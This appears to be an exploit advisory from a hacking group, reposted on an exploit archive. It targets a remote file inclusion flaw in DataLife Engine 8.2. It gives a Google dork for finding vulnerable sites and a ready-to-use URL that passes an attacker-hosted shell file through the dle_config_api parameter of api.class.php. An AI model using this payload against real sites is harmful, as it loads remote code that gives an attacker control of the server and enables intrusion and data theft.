id: 5725
date: 08/31/2009
title: DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability
author: Kurd-Team
cves: 

======================================================================
DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability
======================================================================


======================================================
DatalifeEngine 8.2 Remote File Inclusion Vulnerability
 
<<!>> Found by  :  kurdish hackers team               
<<!>> Groups : Kurd-Team
<<!>> site   : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script   :: DatalifeEngine8.2
<<->> home script :: http://dlecms.com/download/DatalifeEngine8.2.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> google dork : Powered By DataLife Engine
<<->> Exploit ::
 
 >>> www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
 
 
=======================================================




#  0day.today [2023-03-23]  #